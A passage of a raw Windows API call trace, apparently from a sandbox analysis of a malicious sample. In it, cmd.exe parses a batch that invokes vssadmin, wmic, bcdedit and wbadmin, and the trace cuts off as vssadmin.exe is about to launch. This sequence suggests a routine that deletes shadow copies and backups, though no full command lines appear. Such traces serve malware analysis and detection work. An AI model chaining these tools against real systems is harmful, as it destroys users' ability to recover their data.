(lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xb9f628 | out: lpFindFileData=0xb9f628*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x104930 [0104.985] FindClose (in: hFindFile=0x104930 | out: hFindFile=0x104930) returned 1 [0104.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xb9f628 | out: lpFindFileData=0xb9f628*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x104930 [0104.985] FindClose (in: hFindFile=0x104930 | out: hFindFile=0x104930) returned 1 [0104.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xb9f628 | out: lpFindFileData=0xb9f628*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x104930 [0104.985] FindClose (in: hFindFile=0x104930 | out: hFindFile=0x104930) returned 1 [0104.986] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.986] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0104.986] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0104.986] GetProcessHeap () returned 0x100000 [0104.986] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x107b60) returned 1 [0104.986] GetEnvironmentStringsW () returned 0x107070* [0104.986] GetProcessHeap () returned 0x100000 [0104.986] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb1a) returned 0x107b98 [0104.986] FreeEnvironmentStringsA (penv="=") returned 1 [0104.986] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x200048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.986] GetProcessHeap () returned 0x100000 [0104.986] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1048f0) returned 1 [0104.986] ??_V@YAXPAX@Z () returned 0x1 [0104.986] ??_V@YAXPAX@Z () returned 0x1 [0104.986] GetProcessHeap () returned 0x100000 [0104.986] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x400e) returned 0x1086c0 [0104.987] GetProcessHeap () returned 0x100000 [0104.987] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x272) returned 0x105b10 [0104.987] GetProcessHeap () returned 0x100000 [0104.987] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1086c0) returned 1 [0104.987] GetConsoleOutputCP () returned 0x1b5 [0105.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0105.139] GetUserDefaultLCID () returned 0x409 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xfbf82c, cchData=8 | out: lpLCData=":") returned 2 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xb9fc14, cchData=128 | out: lpLCData="0") returned 2 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xb9fc14, cchData=128 | out: lpLCData="0") returned 2 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xb9fc14, cchData=128 | out: lpLCData="1") returned 2 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xfbf81c, cchData=8 | out: lpLCData="/") returned 2 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xfbf7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xfbf778, cchData=32 | out: lpLCData="Tue") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xfbf738, cchData=32 | out: lpLCData="Wed") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xfbf6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xfbf6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xfbf678, cchData=32 | out: lpLCData="Sat") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xfbf638, cchData=32 | out: lpLCData="Sun") returned 4 [0105.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xfbf80c, cchData=8 | out: lpLCData=".") returned 2 [0105.140] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xfbf7f8, cchData=8 | out: lpLCData=",") returned 2 [0105.140] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.142] GetProcessHeap () returned 0x100000 [0105.142] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x0, Size=0x20c) returned 0x105d90 [0105.142] GetConsoleTitleW (in: lpConsoleTitle=0x105d90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.252] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0105.252] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0105.252] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0105.252] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0105.253] ??_V@YAXPAX@Z () returned 0x1 [0105.253] GetProcessHeap () returned 0x100000 [0105.254] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x400a) returned 0x1086c0 [0105.254] GetProcessHeap () returned 0x100000 [0105.254] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1086c0) returned 1 [0105.254] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0105.254] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0105.254] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0105.254] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0105.256] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0105.256] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0105.256] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0105.256] GetProcessHeap () returned 0x100000 [0105.256] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x104938 [0105.256] GetProcessHeap () returned 0x100000 [0105.256] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1a) returned 0x104998 [0105.257] GetProcessHeap () returned 0x100000 [0105.257] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x42) returned 0x105fa8 [0105.258] GetProcessHeap () returned 0x100000 [0105.258] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x105ff8 [0105.258] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0105.258] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0105.258] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0105.258] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0105.258] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0105.258] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0105.258] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0105.258] GetProcessHeap () returned 0x100000 [0105.258] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106058 [0105.258] GetProcessHeap () returned 0x100000 [0105.258] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x12) returned 0x1049c0 [0105.259] GetProcessHeap () returned 0x100000 [0105.259] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x30) returned 0x1060b8 [0105.260] GetProcessHeap () returned 0x100000 [0105.260] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x1060f0 [0105.260] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0105.260] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0105.260] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0105.260] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0105.260] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0105.260] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0105.260] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0105.260] GetProcessHeap () returned 0x100000 [0105.261] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106150 [0105.261] GetProcessHeap () returned 0x100000 [0105.261] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x1049e0 [0105.262] GetProcessHeap () returned 0x100000 [0105.262] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x70) returned 0x1061b0 [0105.262] GetProcessHeap () returned 0x100000 [0105.262] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106228 [0105.263] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0105.263] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0105.263] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0105.263] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0105.263] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0105.263] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0105.263] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0105.263] GetProcessHeap () returned 0x100000 [0105.263] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106288 [0105.263] GetProcessHeap () returned 0x100000 [0105.263] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x1062e8 [0105.264] GetProcessHeap () returned 0x100000 [0105.264] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x50) returned 0x106308 [0105.265] GetProcessHeap () returned 0x100000 [0105.265] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106360 [0105.265] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0105.265] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0105.265] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0105.266] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0105.266] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0105.266] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0105.266] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0105.267] GetProcessHeap () returned 0x100000 [0105.267] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x1063c0 [0105.267] GetProcessHeap () returned 0x100000 [0105.267] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x106420 [0105.267] GetProcessHeap () returned 0x100000 [0105.267] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x38) returned 0x106440 [0105.268] GetProcessHeap () returned 0x100000 [0105.268] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x106480 [0105.269] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0105.269] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0105.269] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0105.269] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0105.269] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0105.269] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0105.269] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0105.269] GetProcessHeap () returned 0x100000 [0105.269] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x1064e0 [0105.269] GetProcessHeap () returned 0x100000 [0105.269] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x106540 [0105.270] GetProcessHeap () returned 0x100000 [0105.270] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x3e) returned 0x100ae0 [0105.270] GetProcessHeap () returned 0x100000 [0105.270] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x100b28 [0105.271] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0105.271] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0105.271] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0105.271] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0105.271] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0105.271] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0105.271] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0105.271] GetProcessHeap () returned 0x100000 [0105.271] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x100b88 [0105.271] GetProcessHeap () returned 0x100000 [0105.271] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x106560 [0105.272] GetProcessHeap () returned 0x100000 [0105.272] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x5e) returned 0x100be8 [0105.273] GetProcessHeap () returned 0x100000 [0105.273] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x100c50 [0105.273] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0105.273] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0105.273] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0105.273] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0105.273] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0105.273] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0105.273] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0105.273] GetProcessHeap () returned 0x100000 [0105.273] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x58) returned 0x100cb0 [0105.273] GetProcessHeap () returned 0x100000 [0105.273] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x100d10 [0105.273] GetProcessHeap () returned 0x100000 [0105.273] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x26) returned 0x100d30 [0105.274] GetConsoleTitleW (in: lpConsoleTitle=0xb9faa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.339] malloc (_Size=0xffce) returned 0x2127e0 [0105.339] ??_V@YAXPAX@Z () returned 0xb9f834 [0105.340] malloc (_Size=0xffce) returned 0x2227b8 [0105.340] ??_V@YAXPAX@Z () returned 0xb9f5ec [0105.341] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0105.341] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0105.341] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0105.341] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0105.341] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0105.341] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0105.341] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0105.341] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0105.341] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0105.341] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0105.341] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0105.341] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0105.341] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0105.341] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0105.341] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0105.341] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0105.341] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0105.341] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0105.341] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0105.341] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0105.341] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0105.341] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0105.341] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0105.341] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0105.341] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0105.341] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0105.342] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0105.342] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0105.342] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0105.342] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0105.342] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0105.342] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0105.342] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0105.342] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0105.342] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0105.342] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0105.342] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0105.342] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0105.342] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0105.342] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0105.342] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0105.342] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0105.342] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0105.342] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0105.342] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0105.342] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0105.342] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0105.342] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0105.342] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0105.342] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0105.342] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0105.342] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0105.342] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0105.342] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0105.342] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0105.342] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0105.342] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0105.342] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0105.342] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0105.342] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0105.342] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0105.342] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0105.343] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0105.343] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0105.343] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0105.343] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0105.343] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0105.343] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0105.343] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0105.343] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0105.343] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0105.343] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0105.343] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0105.343] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0105.343] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0105.343] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0105.343] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0105.343] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0105.343] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0105.343] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0105.343] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0105.343] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0105.343] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0105.343] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0105.343] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0105.343] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0105.343] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0105.343] ??_V@YAXPAX@Z () returned 0x1 [0105.344] GetProcessHeap () returned 0x100000 [0105.344] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x1086c0 [0105.344] GetProcessHeap () returned 0x100000 [0105.344] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x54) returned 0x100d60 [0105.344] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0105.344] malloc (_Size=0xffce) returned 0x2227b8 [0105.345] ??_V@YAXPAX@Z () returned 0xb9f36c [0105.345] GetProcessHeap () returned 0x100000 [0105.345] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x1186a0 [0105.347] SetErrorMode (uMode=0x0) returned 0x0 [0105.347] SetErrorMode (uMode=0x1) returned 0x0 [0105.347] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1186a8, lpFilePart=0xb9f38c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f38c*="Desktop") returned 0x17 [0105.347] SetErrorMode (uMode=0x0) returned 0x1 [0105.347] GetProcessHeap () returned 0x100000 [0105.347] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1186a0, Size=0x4a) returned 0x1186a0 [0105.347] GetProcessHeap () returned 0x100000 [0105.347] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1186a0) returned 0x4a [0105.347] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0105.347] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.349] GetProcessHeap () returned 0x100000 [0105.349] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x100dc0 [0105.349] GetProcessHeap () returned 0x100000 [0105.349] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x100f80 [0105.352] GetProcessHeap () returned 0x100000 [0105.352] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x100f80, Size=0x1b6) returned 0x100f80 [0105.352] GetProcessHeap () returned 0x100000 [0105.352] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x100f80) returned 0x1b6 [0105.352] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.352] GetProcessHeap () returned 0x100000 [0105.352] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x101140 [0105.352] GetProcessHeap () returned 0x100000 [0105.352] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x101140, Size=0x76) returned 0x101140 [0105.352] GetProcessHeap () returned 0x100000 [0105.353] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x101140) returned 0x76 [0105.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.353] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f118) returned 0xffffffff [0105.353] GetLastError () returned 0x2 [0105.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.353] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f118) returned 0xffffffff [0105.424] GetLastError () returned 0x2 [0105.425] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.425] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f118) returned 0x1011c0 [0105.425] GetProcessHeap () returned 0x100000 [0105.425] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x0, Size=0x14) returned 0x101200 [0105.425] FindClose (in: hFindFile=0x1011c0 | out: hFindFile=0x1011c0) returned 1 [0105.425] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0xb9f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f118) returned 0xffffffff [0105.425] GetLastError () returned 0x2 [0105.425] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0xb9f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f118) returned 0x1011c0 [0105.425] GetProcessHeap () returned 0x100000 [0105.425] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x101200, Size=0x4) returned 0x101200 [0105.425] FindClose (in: hFindFile=0x1011c0 | out: hFindFile=0x1011c0) returned 1 [0105.425] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.425] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.425] ??_V@YAXPAX@Z () returned 0x1 [0105.425] GetConsoleTitleW (in: lpConsoleTitle=0xb9f61c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.521] InitializeProcThreadAttributeList (in: lpAttributeList=0xb9f548, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb9f534 | out: lpAttributeList=0xb9f548, lpSize=0xb9f534) returned 1 [0105.521] UpdateProcThreadAttribute (in: lpAttributeList=0xb9f548, dwFlags=0x0, Attribute=0x60001, lpValue=0xb9f530, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb9f548, lpPreviousValue=0x0) returned 1 [0105.521] GetStartupInfoW (in: lpStartupInfo=0xb9f580 | out: lpStartupInfo=0xb9f580*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 